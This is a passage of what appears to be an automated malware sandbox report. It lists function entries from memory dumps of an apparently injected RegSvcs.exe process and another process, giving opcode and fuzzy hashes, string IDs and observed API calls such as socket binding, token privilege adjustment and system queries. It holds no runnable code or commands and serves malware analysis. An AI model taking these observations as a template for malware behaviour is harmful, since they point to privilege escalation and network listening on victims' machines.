API String ID: 0-3997229613
Opcode ID: 446942bf6a1e483069b81db972722f696151482818310ebe76dca7d08d4dce83
Instruction ID: 4c11480bc70b999ac40bd207366f1aa37372ed62397bd9f72883187d784bc994
Opcode Fuzzy Hash: 446942bf6a1e483069b81db972722f696151482818310ebe76dca7d08d4dce83
Instruction Fuzzy Hash: F9511075D05209DFCF04CFAAC580AAEFBF2BB89300F20956AD615B7254D3349A02CF64

Uniqueness

Uniqueness Score: -1.00%

Function 006FC5B0, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 402880418c74e0b8afb47fd87e9118656da0ffebb22432f9fd76e5ae1bb6805f
Instruction ID: cc819c2fd57aa02e84765eeeffdf2dc6b1eab9a1df3d1f0b5b07fad9da3284bf
Opcode Fuzzy Hash: 402880418c74e0b8afb47fd87e9118656da0ffebb22432f9fd76e5ae1bb6805f
Instruction Fuzzy Hash: C4A11774D0421DDFDB14DFA9C6809ADFBB2BF89314F24D1A9D816AB246C7309A42DF84

Uniqueness

Uniqueness Score: -1.00%

Function 006FC594, Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a490c18350cfae9f002ae06eb5e2c68495bd35705efe1b4141e3c39f8a5a7442
Instruction ID: 3f8bbd9a15aa4579fd2feb457d094276f07111b8c4d1790bde537d15226b8bea
Opcode Fuzzy Hash: a490c18350cfae9f002ae06eb5e2c68495bd35705efe1b4141e3c39f8a5a7442
Instruction Fuzzy Hash: EBA14770D0425DDFDB14DFA5C6805ADFBB2BF89300F24D1AAC816AB256C7309A42DF84

Uniqueness

Uniqueness Score: -1.00%

Function 006F8189, Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a14069f2d7dcc8b2bf944a858db3fdbbfaba15640f0ab4a656bd558cc171cc4
Instruction ID: 50493b776f67902e3b99eb1b77c1e74d06bd10878833c423e0610a8a7a2d28cb
Opcode Fuzzy Hash: 9a14069f2d7dcc8b2bf944a858db3fdbbfaba15640f0ab4a656bd558cc171cc4
Instruction Fuzzy Hash: AC61C034E15219EFCB44CFA9D8859ADFBF2BF49310F24819AE815AB211D734AA42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 006F8198, Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db7812cd16fee7f0cad9ff1fbdb99c776564a31e83b521ccb2c8fdb9489e57e2
Instruction ID: b42878d866d2bc43d72434bdf38a3964322b0de645c217c0de0064478dad29d3
Opcode Fuzzy Hash: db7812cd16fee7f0cad9ff1fbdb99c776564a31e83b521ccb2c8fdb9489e57e2
Instruction Fuzzy Hash: 9561B174E15219EFCB44CFA9D8859ADFBF2FF49310F248199E819AB210D734AA42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 006F3FE8, Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ae3bc2852a2290f65c90844fa3a83f9695a4adff7f693578350d989050cd7ec
Instruction ID: ad68f6692269c35a581a3dd1e5ffbf617cf5a8cfdee9d5912d334ef59a4610c8
Opcode Fuzzy Hash: 8ae3bc2852a2290f65c90844fa3a83f9695a4adff7f693578350d989050cd7ec
Instruction Fuzzy Hash: 9C515674D0121ADFDB04CFA9C4806AEBBF2FF88310F20942AD615B7614DB349A41CF95

Uniqueness

Uniqueness Score: -1.00%

Function 006F8E38, Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07aac44f866304b368335ef635e47d887bfc9aa7f9a200f043528d7394657824
Instruction ID: f61be2f74b0f8afc18a3ed1eed1dd54c38d3da4d17464e97513ed9f4f5b9440e
Opcode Fuzzy Hash: 07aac44f866304b368335ef635e47d887bfc9aa7f9a200f043528d7394657824
Instruction Fuzzy Hash: 5F5106B0D0920EDFCB00CFA4D9815AEBBB2FF49304F24959AD555BB204DB349B42DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 006FAA80, Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23974af591e05a7696ff6a49433e31648201aa7ef48f55907228b85feb958d48
Instruction ID: ec60007282427d62d1b5d9665e2b318542ee79740f3481c7d8b9dd8e8d419095
Opcode Fuzzy Hash: 23974af591e05a7696ff6a49433e31648201aa7ef48f55907228b85feb958d48
Instruction Fuzzy Hash: A551A170D08289DFDB14DFA5D6910ADFFB3BF86300B28C1AAC4599B256D7309A02DF95

Uniqueness

Uniqueness Score: -1.00%

Function 006F9140, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e49681e77d3719093ad9e8592d27c97e432c648e635dabc3ad5466026e3197c0
Instruction ID: 97104d4f8d1da57b9576e11fab9f28adca945f6482dabd819ccb30731bf4cc62
Opcode Fuzzy Hash: e49681e77d3719093ad9e8592d27c97e432c648e635dabc3ad5466026e3197c0
Instruction Fuzzy Hash: 11410870D0520ADFDB08CFA5C5815AEFBB2BF89310F24D56AC516AB248D7349652CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 006F9150, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6656fcfb5f57996945644f83d3eee2d9ee03070235eaae482268775a78f4ded3
Instruction ID: e43f52b68e7892ba10df84c05f52f0c8dc81d566236a71204e064ad07bce8bc9
Opcode Fuzzy Hash: 6656fcfb5f57996945644f83d3eee2d9ee03070235eaae482268775a78f4ded3
Instruction Fuzzy Hash: D6411770D0420EDFDB08CF96C5816BEFBB2BF89300F20956AC515AB248D73496528FA4

Uniqueness

Uniqueness Score: -1.00%

Function 006FF229, Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e622f36d4a8ecdc0711c13ca707408289fee1f2daab58da1c23c8a637b10be40
Instruction ID: 668a78952a9465b6082867ff07a2b42b60def5c2c62913850d54ad5329c636de
Opcode Fuzzy Hash: e622f36d4a8ecdc0711c13ca707408289fee1f2daab58da1c23c8a637b10be40
Instruction Fuzzy Hash: 104114B8D0A209EFDB44CFE5D5805AEBBB2EF89300F20E4AAD501A7254D7389B41CF15

Uniqueness

Uniqueness Score: -1.00%

Function 006FF238, Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c94a340e6006bb7a4fb44410c8273620a86033da686344875953e3e34e26ee8
Instruction ID: 32af8eca9e65f9f977db2c8ce9fca1f314330afd69369d0d22df275161e598e4
Opcode Fuzzy Hash: 8c94a340e6006bb7a4fb44410c8273620a86033da686344875953e3e34e26ee8
Instruction Fuzzy Hash: A94102B8D0A209EBDB44CFE5D5805AEBBF6EF89300F20E4AAD501A6254D7389A41CF55

Uniqueness

Uniqueness Score: -1.00%

Function 006F958A, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f3737c0dbf503c127599ece9def8399a52a0ec0e917ef63fca909503e7125cb
Instruction ID: 7c387c9d8b98708e4a872946725454fe042df69bf2d00113cab89357926e4bd7
Opcode Fuzzy Hash: 9f3737c0dbf503c127599ece9def8399a52a0ec0e917ef63fca909503e7125cb
Instruction Fuzzy Hash: 50412774D0920ADFDB05CFA6C5805AEFBB2BF89300F20D0AAC515EB215D7349A42DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 006FAAD8, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8220294366a786040e5954b6c595460f9f11d20fb31eab6c2778139c46858130
Instruction ID: 6a618ebe13f6816d27b0a534bb7beb9c2bde61760a1c74495c8044ebe5efbeca
Opcode Fuzzy Hash: 8220294366a786040e5954b6c595460f9f11d20fb31eab6c2778139c46858130
Instruction Fuzzy Hash: 4B412CB0D04219DBDB14DFAAC5814ADFBF7BF89300F24C169C819AB20AD7349A02DF95

Uniqueness

Uniqueness Score: -1.00%

Function 006F9598, Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36c4161363e9985ecc8a031897f5e53edc056f4566ec6f97d14106d9ac7507bd
Instruction ID: 44ed69492e4cd18ffd01dca0925f697774a6444ff62a59d67d27b1699e0466bb
Opcode Fuzzy Hash: 36c4161363e9985ecc8a031897f5e53edc056f4566ec6f97d14106d9ac7507bd
Instruction Fuzzy Hash: 8841E275D0920EDBDB04CF9AC5805AEFBB2BF89300F20956AC515AB214D7349A42CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 006FB9B0, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d64e0b951e8fd736c31ad72b641cd5a37240807bfd6deeaad74c85547a8c0483
Instruction ID: 4c57adf3c4e08f27e1235239b67098d6187230eb8326cf523cd2affd2f305b44
Opcode Fuzzy Hash: d64e0b951e8fd736c31ad72b641cd5a37240807bfd6deeaad74c85547a8c0483
Instruction Fuzzy Hash: 47213770D05209DFDB18CFAAC9416AEFBF3BF88340F20E52AC515AB254D7348A028F44

Uniqueness

Uniqueness Score: -1.00%

Function 006F4A40, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b08bf74c5784eec96eb7da2e6b7dfa500e25a2002680d67b9d1a89d0a2858ee
Instruction ID: 7a3f81ecd28b67f56b4e6d72eeadb9a498a9e273ebd18b8abd505ec0519c05ff
Opcode Fuzzy Hash: 1b08bf74c5784eec96eb7da2e6b7dfa500e25a2002680d67b9d1a89d0a2858ee
Instruction Fuzzy Hash: C6210E71E056189FDB18CFABDC4059EBBF7AFC9200F14C1B6D509AA255DB300545CB51

Uniqueness

Uniqueness Score: -1.00%

Function 006F9738, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3384eafb8ea9589587aaf6446f42e04c83a8fd26e0b92adcd876b43da323da
Instruction ID: 7031caea3ab2485beb898e924054bf141ce68e1efbf6c601dd845b0e2318e131
Opcode Fuzzy Hash: dd3384eafb8ea9589587aaf6446f42e04c83a8fd26e0b92adcd876b43da323da
Instruction Fuzzy Hash: 8C211AB1E056189BEB08CFAB9C402DEFBF3AFC9200F18C17AD508A6225E7340546CB51

Uniqueness

Uniqueness Score: -1.00%

Function 006FCC90, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb0ddc51a4e715eb888f1c37da61f4926b8984162f32c32dc2b2cdd2b4c1c375
Instruction ID: a138e47f5ac46c1ca22aa5941c6136ff8e1ffcbc17914b9da9252593bcd36c5d
Opcode Fuzzy Hash: eb0ddc51a4e715eb888f1c37da61f4926b8984162f32c32dc2b2cdd2b4c1c375
Instruction Fuzzy Hash: F71183B1E056099BDB18CFAB99401AEFBF7AFC9200F64C57A8818A7215EB345A118F51

Uniqueness

Uniqueness Score: -1.00%

Function 006FCC8A, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7d13846535bfbe7c82e42a98fa666286829c6668ad0deeb2860d707f588f8a0
Instruction ID: 1f9f726d7c17a21984f968c15473b19bc1b0d8b025fe0da3f5800003ea89b4a8
Opcode Fuzzy Hash: a7d13846535bfbe7c82e42a98fa666286829c6668ad0deeb2860d707f588f8a0
Instruction Fuzzy Hash: 991196B1E01609CBDB18CFAB89401AEFBF3AFC8300F24C57AC418AB214DB3456028F51

Uniqueness

Uniqueness Score: -1.00%

Function 006FC010, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f1f84203c8bbb035e006f4803084343973d92171467a6ffbcd604eccb6e3aa1
Instruction ID: 22f4c020efaf05d9d38d9deed49b683c80a369c790ac52c1fc1f7ec02f03e813
Opcode Fuzzy Hash: 2f1f84203c8bbb035e006f4803084343973d92171467a6ffbcd604eccb6e3aa1
Instruction Fuzzy Hash: E811B771D0560DCBDB18CFAB99441AEFAF7ABC9300F24C17A8518AB255DB345A129F40

Uniqueness

Uniqueness Score: -1.00%

Function 006FC000, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a511faba6cbaab922c8d7405cd9382d9becd9c613146ec4abaa4b4e8c8d2f72a
Instruction ID: f674566053d39b5e1e89ba50cbeeee9ea954e53fba9d56d6efd5a2757c2aa197
Opcode Fuzzy Hash: a511faba6cbaab922c8d7405cd9382d9becd9c613146ec4abaa4b4e8c8d2f72a
Instruction Fuzzy Hash: 0611B771D05649CFDB49DFBB8A541AEBBF3AFC9300F28C07AC418AA265DB3446069F51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exe PID: 2996 Parent PID: 1580 RegSvcs.exeCOMMON

Execution Graph

Execution Coverage:	20.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.7%
Total number of Nodes:	191
Total number of Limit Nodes:	13

Executed Functions

Function 004538C8, Relevance: 7.0, Strings: 5, Instructions: 784
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*_4q, xrefs: 00454095
HVq, xrefs: 00453CFE
0EVq, xrefs: 0045413B
HVq, xrefs: 00453D0A
T,, xrefs: 004540F8

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: *_4q$0EVq$HVq$HVq$T,
API String ID: 0-1665503141
Opcode ID: 56a7ea57599abe036a02d4734217894679696722a177467c6e9618f796993378
Instruction ID: ade7d71abf25320d3cd7267fc8062090f23d7f4250c3712218acf409538f6807
Opcode Fuzzy Hash: 56a7ea57599abe036a02d4734217894679696722a177467c6e9618f796993378
Instruction Fuzzy Hash: C2524771A04205CFCB05DF68C8805AAFBB1FF85306B25859BD845AF253D734EE8ACB95

Uniqueness

Uniqueness Score: -1.00%

Function 00452418, Relevance: 4.3, Strings: 3, Instructions: 505
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_4q, xrefs: 00452739
_4q, xrefs: 00452A3A
QAE, xrefs: 00452B1A

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: _4q$_4q$QAE
API String ID: 0-2535415465
Opcode ID: b6ccd59223cd4849d7a84d5652a621e23afbe1816b3cd632edbf7cd3c8ff33ec
Instruction ID: 0a01fe6f30ceecf52e266ff9fed9bf19246f40246301487d4120b2159ab9e89d
Opcode Fuzzy Hash: b6ccd59223cd4849d7a84d5652a621e23afbe1816b3cd632edbf7cd3c8ff33ec
Instruction Fuzzy Hash: DC12D130A00215CFDB14DF65CA8466EB7F2BF86306F24816FD8159B352DBB89D8ACB45

Uniqueness

Uniqueness Score: -1.00%

Function 00458D88, Relevance: 3.0, Strings: 2, Instructions: 505
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_4q, xrefs: 004590A9
_4q, xrefs: 004593AA

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: _4q$_4q
API String ID: 0-3276247567
Opcode ID: 87a57046ed7eef2904d3dafca0fd623c0925d423782609836d96e51b92c0c10a
Instruction ID: cb00764f2607a5ba7494c98d64312efdc8917abd5a62c4ac1206a67ab3f6a8cd
Opcode Fuzzy Hash: 87a57046ed7eef2904d3dafca0fd623c0925d423782609836d96e51b92c0c10a
Instruction Fuzzy Hash: A912CF30A04615DFD724DF24C8842AEB7F2FF9530AF24856ED816AB352DB788D4ADB44

Uniqueness

Uniqueness Score: -1.00%

Function 0045B658, Relevance: 2.2, Strings: 1, Instructions: 917COMMON

Download Yara Rule

Strings

r, xrefs: 0045C10C

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 006c3e37cc636b3b6ede729b1a233d71b616bed6a9df18044f004a3bdf77f06b
Instruction ID: a5da34297823ece15a07ec192b69a106f7e54e73534b1f7e39e3af566bf438b8
Opcode Fuzzy Hash: 006c3e37cc636b3b6ede729b1a233d71b616bed6a9df18044f004a3bdf77f06b
Instruction Fuzzy Hash: E8824A70A00605CFCB14CF68C984A9EFBF2FF89311F15856AD81AAB652D734E949CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004D2998, Relevance: 1.6, APIs: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 004D2A4B

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 6dee22d15ed32865f53cebcf7183f4a86644fb31c3af22ab907c85c756e35f93
Instruction ID: d7def23f52b94bd62c74e7c143baf2bd1cd9d7b3a18905367335542a9cb266be
Opcode Fuzzy Hash: 6dee22d15ed32865f53cebcf7183f4a86644fb31c3af22ab907c85c756e35f93
Instruction Fuzzy Hash: 443192715093C09FE7138B208D54B56BFB8EF17210F0984DBD984CF293D2699909C775

Uniqueness

Uniqueness Score: -1.00%

Function 004D1463, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 004D14E3

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 5af0846df54a272463370ba8a0e54667dd7f0cf12e1a27c35632867a80d2a800
Instruction ID: b585568e2a0db6e8b664e31fd584897fdfdb58cc8176815552b82c8043824bc6
Opcode Fuzzy Hash: 5af0846df54a272463370ba8a0e54667dd7f0cf12e1a27c35632867a80d2a800
Instruction Fuzzy Hash: 1721F376109780AFEB128F24DC54B52BFF4EF06310F0885DBE9858B263D234D808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004D169F, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 004D1715

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 8c38f55defc898fd2076be4ccbf41cbd8dc6f517558ffb8008ecfff1e40e877b
Instruction ID: 05d2ea4eb46df20b212eb3024a11462b3ce9cec510afbf9ff85704b3c4a408f5
Opcode Fuzzy Hash: 8c38f55defc898fd2076be4ccbf41cbd8dc6f517558ffb8008ecfff1e40e877b
Instruction Fuzzy Hash: 6221F0724097C0AFDB238B20DC55A52FFB0EF17314F0980DBED848B263D265A909DB62

Uniqueness

Uniqueness Score: -1.00%

Function 004D29EA, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E40,978F22E5,00000000,00000000,00000000,00000000), ref: 004D2A4B

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: e67a6e24f09d26d7849e67a1e5d48fbf94f4cc4d8e0bbcdeef3645e19320e593
Instruction ID: 16b0a845d074ad3207a2459bc55588ab291bb23d462596f6220614f63b9c2343
Opcode Fuzzy Hash: e67a6e24f09d26d7849e67a1e5d48fbf94f4cc4d8e0bbcdeef3645e19320e593
Instruction Fuzzy Hash: CA11BF71500304AFF720CF55DD84FAAFBA8EF14320F1485ABE9089B341D6B8E944CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 004D149A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 004D14E3

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: ae844aba655a8b3ac439b1cd38bcec7bf6a073f71f281baacc6d065146b88ba0
Instruction ID: ccc85b5c36cd75119edb31029acdfb2a76a060d096e84c2abca58e727a74771c
Opcode Fuzzy Hash: ae844aba655a8b3ac439b1cd38bcec7bf6a073f71f281baacc6d065146b88ba0
Instruction Fuzzy Hash: 6A11A336500300AFEB20CF55D844B66FBE4EF04320F0884ABDD4A8B721D235E454DB61

Uniqueness

Uniqueness Score: -1.00%

Function 004D11C2, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 004D11F4

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 31d78e14125eccbb28cac20fff086b51ec340ae075cbf495b992516686969726
Instruction ID: 06efcfa7a24e341b2222ac683e81e81690985c129bf7fae15cdf67b5311f2a13
Opcode Fuzzy Hash: 31d78e14125eccbb28cac20fff086b51ec340ae075cbf495b992516686969726
Instruction Fuzzy Hash: 2201AD31905340AFEB10CF55E88876AFBE0EB44320F08C4EBDD088B312D279A544CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 004D16DA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 004D1715

Memory Dump Source

Source File: 00000008.00000002.671481416.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d0000_RegSvcs.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 86de2f9c1859a9d7e256e8432a7331c37b348f4c9d580686bbecc4ee827ab3d0
Instruction ID: 855a64e28de0a0355955c4e1ecec4b3063852e62a5605a2369e7d286a79af42f
Opcode Fuzzy Hash: 86de2f9c1859a9d7e256e8432a7331c37b348f4c9d580686bbecc4ee827ab3d0
Instruction Fuzzy Hash: 1401AD35500740EFEB20CF45D889B66FFA0EF08720F08C09BDD494B722D275A459DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00459988, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_450000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 309371e4db0e38d257e30cc22f0efdcc44137fcb9077b320788f738ce010f265
Instruction ID: 28d14e5f89bbefd80efb1012458bf5f6de7a0a83446925ae3b46be4ca3ddfa06
Opcode Fuzzy Hash: 309371e4db0e38d257e30cc22f0efdcc44137fcb9077b320788f738ce010f265
Instruction Fuzzy Hash: EA81A131F01115CBDB14DB69D84066EB7E3AFC4311F29807AE80ADB356DE38DD068B95

Uniqueness

Uniqueness Score: -1.00%

Function 00459A4F, Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.671440044.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false

Joe Sandbox IDA Plugin

